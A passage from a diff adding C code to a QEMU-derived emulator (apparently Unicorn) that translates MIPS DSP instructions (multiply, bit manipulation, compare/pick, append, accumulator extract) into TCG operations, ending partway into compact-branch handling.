check_dsp(ctx); + gen_helper_muleq_s_w_phl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEQ_S_W_PHR: + check_dsp(ctx); + gen_helper_muleq_s_w_phr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_S_PH: + check_dspr2(ctx); + gen_helper_mulq_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_ADDU_OB_DSP: + switch (op2) { + case OPC_MULEQ_S_PW_QHL: + check_dsp(ctx); + gen_helper_muleq_s_pw_qhl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEQ_S_PW_QHR: + check_dsp(ctx); + gen_helper_muleq_s_pw_qhr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEU_S_QH_OBL: + check_dsp(ctx); + gen_helper_muleu_s_qh_obl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEU_S_QH_OBR: + check_dsp(ctx); + gen_helper_muleu_s_qh_obr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_RS_QH: + check_dsp(ctx); + gen_helper_mulq_rs_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free_i32(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); + +} + +static void gen_mipsdsp_bitinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int val) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp Bit/ Manipulation"; + int16_t imm; + TCGv t0; + TCGv val_t; + + if (ret == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + val_t = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, val_t, val); + + switch (op1) { + case OPC_ABSQ_S_PH_DSP: + switch (op2) { + case OPC_BITREV: + check_dsp(ctx); + gen_helper_bitrev(tcg_ctx, *cpu_gpr[ret], val_t); + break; + case OPC_REPL_QB: + check_dsp(ctx); + { + target_long result; + imm = (ctx->opcode >> 16) & 0xFF; + result = (uint32_t)imm << 24 | + (uint32_t)imm << 16 | + (uint32_t)imm << 8 | + (uint32_t)imm; + result = (int32_t)result; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], result); + } + break; + case OPC_REPLV_QB: + check_dsp(ctx); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 8); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + case OPC_REPL_PH: + check_dsp(ctx); + { + imm = (ctx->opcode >> 16) & 0x03FF; + imm = (int16_t)(imm << 6) >> 6; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], \ + (target_long)((int32_t)((uint32_t)imm << 16) | \ + (uint16_t)imm)); + } + break; + case OPC_REPLV_PH: + check_dsp(ctx); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret]); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_ABSQ_S_QH_DSP: + switch (op2) { + case OPC_REPL_OB: + check_dsp(ctx); + { + target_long temp; + + imm = (ctx->opcode >> 16) & 0xFF; + temp = ((uint64_t)imm << 8) | (uint64_t)imm; + temp = (temp << 16) | temp; + temp = (temp << 32) | temp; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], temp); + break; + } + case OPC_REPL_PW: + check_dsp(ctx); + { + target_long temp; + + imm = (ctx->opcode >> 16) & 0x03FF; + imm = (int16_t)(imm << 6) >> 6; + temp = ((target_long)imm << 32) \ + | ((target_long)imm & 0xFFFFFFFF); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], temp); + break; + } + case OPC_REPL_QH: + check_dsp(ctx); + { + target_long temp; + + imm = (ctx->opcode >> 16) & 0x03FF; + imm = (int16_t)(imm << 6) >> 6; + + temp = ((uint64_t)(uint16_t)imm << 48) | + ((uint64_t)(uint16_t)imm << 32) | + ((uint64_t)(uint16_t)imm << 16) | + (uint64_t)(uint16_t)imm; + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[ret], temp); + break; + } + case OPC_REPLV_OB: + check_dsp(ctx); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 8); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + break; + case OPC_REPLV_PW: + check_dsp(ctx); + tcg_gen_ext32u_i64(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + break; + case OPC_REPLV_QH: + check_dsp(ctx); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_gpr[ret], val_t); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 16); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + tcg_gen_shli_tl(tcg_ctx, t0, *cpu_gpr[ret], 32); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[ret], *cpu_gpr[ret], t0); + break; + } + break; +#endif + } + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, val_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_add_cmp_pick(DisasContext *ctx, + uint32_t op1, uint32_t op2, + int ret, int v1, int v2, int check_ret) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp add compare pick"; + TCGv t1; + TCGv v1_t; + TCGv v2_t; + + if ((ret == 0) && (check_ret == 1)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t1 = tcg_temp_new(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + case OPC_CMPU_EQ_QB_DSP: + switch (op2) { + case OPC_CMPU_EQ_QB: + check_dsp(ctx); + gen_helper_cmpu_eq_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LT_QB: + check_dsp(ctx); + gen_helper_cmpu_lt_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LE_QB: + check_dsp(ctx); + gen_helper_cmpu_le_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGU_EQ_QB: + check_dsp(ctx); + gen_helper_cmpgu_eq_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LT_QB: + check_dsp(ctx); + gen_helper_cmpgu_lt_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LE_QB: + check_dsp(ctx); + gen_helper_cmpgu_le_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGDU_EQ_QB: + check_dspr2(ctx); + gen_helper_cmpgu_eq_qb(tcg_ctx, t1, v1_t, v2_t); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[ret], t1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, t1); + break; + case OPC_CMPGDU_LT_QB: + check_dspr2(ctx); + gen_helper_cmpgu_lt_qb(tcg_ctx, t1, v1_t, v2_t); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[ret], t1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, t1); + break; + case OPC_CMPGDU_LE_QB: + check_dspr2(ctx); + gen_helper_cmpgu_le_qb(tcg_ctx, t1, v1_t, v2_t); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[ret], t1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, 0xF0FFFFFF); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 24); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_dspctrl, *(TCGv *)tcg_ctx->cpu_dspctrl, t1); + break; + case OPC_CMP_EQ_PH: + check_dsp(ctx); + gen_helper_cmp_eq_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LT_PH: + check_dsp(ctx); + gen_helper_cmp_lt_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LE_PH: + check_dsp(ctx); + gen_helper_cmp_le_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_QB: + check_dsp(ctx); + gen_helper_pick_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_PH: + check_dsp(ctx); + gen_helper_pick_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PACKRL_PH: + check_dsp(ctx); + gen_helper_packrl_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_CMPU_EQ_OB_DSP: + switch (op2) { + case OPC_CMP_EQ_PW: + check_dsp(ctx); + gen_helper_cmp_eq_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LT_PW: + check_dsp(ctx); + gen_helper_cmp_lt_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LE_PW: + check_dsp(ctx); + gen_helper_cmp_le_pw(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_EQ_QH: + check_dsp(ctx); + gen_helper_cmp_eq_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LT_QH: + check_dsp(ctx); + gen_helper_cmp_lt_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMP_LE_QH: + check_dsp(ctx); + gen_helper_cmp_le_qh(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGDU_EQ_OB: + check_dspr2(ctx); + gen_helper_cmpgdu_eq_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGDU_LT_OB: + check_dspr2(ctx); + gen_helper_cmpgdu_lt_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGDU_LE_OB: + check_dspr2(ctx); + gen_helper_cmpgdu_le_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPGU_EQ_OB: + check_dsp(ctx); + gen_helper_cmpgu_eq_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LT_OB: + check_dsp(ctx); + gen_helper_cmpgu_lt_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPGU_LE_OB: + check_dsp(ctx); + gen_helper_cmpgu_le_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_CMPU_EQ_OB: + check_dsp(ctx); + gen_helper_cmpu_eq_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LT_OB: + check_dsp(ctx); + gen_helper_cmpu_lt_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_CMPU_LE_OB: + check_dsp(ctx); + gen_helper_cmpu_le_ob(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PACKRL_PW: + check_dsp(ctx); + gen_helper_packrl_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PICK_OB: + check_dsp(ctx); + gen_helper_pick_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_PW: + check_dsp(ctx); + gen_helper_pick_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PICK_QH: + check_dsp(ctx); + gen_helper_pick_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_append(CPUMIPSState *env, DisasContext *ctx, + uint32_t op1, int rt, int rs, int sa) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp append/dappend"; + TCGv t0; + + check_dspr2(ctx); + + if (rt == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + + switch (op1) { + case OPC_APPEND_DSP: + switch (MASK_APPEND(ctx->opcode)) { + case OPC_APPEND: + if (sa != 0) { + tcg_gen_deposit_tl(tcg_ctx, *cpu_gpr[rt], t0, *cpu_gpr[rt], sa, 32 - sa); + } + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + break; + case OPC_PREPEND: + if (sa != 0) { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], sa); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 32 - sa); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + break; + case OPC_BALIGN: + sa &= 3; + if (sa != 0 && sa != 2) { + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], 8 * sa); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (4 - sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + break; + default: /* Invalid */ + MIPS_INVAL("MASK APPEND"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_DAPPEND_DSP: + switch (MASK_DAPPEND(ctx->opcode)) { + case OPC_DAPPEND: + if (sa != 0) { + tcg_gen_deposit_tl(tcg_ctx, *cpu_gpr[rt], t0, *cpu_gpr[rt], sa, 64 - sa); + } + break; + case OPC_PREPENDD: + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], 0x20 | sa); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - (0x20 | sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], t0, t0); + break; + case OPC_PREPENDW: + if (sa != 0) { + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], sa); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - sa); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + break; + case OPC_DBALIGN: + sa &= 7; + if (sa != 0 && sa != 2 && sa != 4) { + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], 8 * sa); + tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (8 - sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + break; + default: /* Invalid */ + MIPS_INVAL("MASK DAPPEND"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#endif + } + tcg_temp_free(tcg_ctx, t0); + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_accinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int v1, int v2, int check_ret) + +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp accumulator"; + TCGv t0; + TCGv t1; + TCGv v1_t; + TCGv v2_t; + int16_t imm; + + if ((ret == 0) && (check_ret == 1)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + case OPC_EXTR_W_DSP: + check_dsp(ctx); + switch (op2) { + case OPC_EXTR_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTR_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_r_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTR_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTR_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_s_h(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_s_h(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_r_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTPDP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extpdp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTPDPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extpdp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHILO: + imm = (ctx->opcode >> 20) & 0x3F; + tcg_gen_movi_tl(tcg_ctx, t0, ret); + tcg_gen_movi_tl(tcg_ctx, t1, imm); + gen_helper_shilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); + break; + case OPC_SHILOV: + tcg_gen_movi_tl(tcg_ctx, t0, ret); + gen_helper_shilo(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_MTHLIP: + tcg_gen_movi_tl(tcg_ctx, t0, ret); + gen_helper_mthlip(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_WRDSP: + imm = (ctx->opcode >> 11) & 0x3FF; + tcg_gen_movi_tl(tcg_ctx, t0, imm); + gen_helper_wrdsp(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); + break; + case OPC_RDDSP: + imm = (ctx->opcode >> 16) & 0x03FF; + tcg_gen_movi_tl(tcg_ctx, t0, imm); + gen_helper_rddsp(tcg_ctx, *cpu_gpr[ret], t0, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_DEXTR_W_DSP: + check_dsp(ctx); + switch (op2) { + case OPC_DMTHLIP: + tcg_gen_movi_tl(tcg_ctx, t0, ret); + gen_helper_dmthlip(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DSHILO: + { + int shift = (ctx->opcode >> 19) & 0x7F; + int ac = (ctx->opcode >> 11) & 0x03; + tcg_gen_movi_tl(tcg_ctx, t0, shift); + tcg_gen_movi_tl(tcg_ctx, t1, ac); + gen_helper_dshilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); + break; + } + case OPC_DSHILOV: + { + int ac = (ctx->opcode >> 11) & 0x03; + tcg_gen_movi_tl(tcg_ctx, t0, ac); + gen_helper_dshilo(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); + break; + } + case OPC_DEXTP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + + gen_helper_dextp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTPDP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextpdp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTPDPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextpdp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_l(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_R_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_r_l(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_RS_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_rs_l(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_r_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_s_h(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_s_h(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_l(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_R_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_r_l(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_RS_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_rs_l(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_r_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +/* End MIPSDSP functions. */ + +/* Compact Branches */ +static void gen_compute_compact_branch(DisasContext *ctx, uint32_t opc, + int rs, int rt, int32_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int bcond_compute = 0; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + if (ctx->hflags & MIPS_HFLAG_BMASK) { +#ifdef MIPS_DEBUG_DISAS + LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx + "\n", ctx->pc); +#endif + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Load needed operands and calculate btarget */ + switch (opc) { + /* compact branch */ + case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + if (rs <= rt && rs == 0) { + /* OPC_BEQZALC, OPC_BNEZALC */ + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + } + break; + case OPC_BLEZC: /* 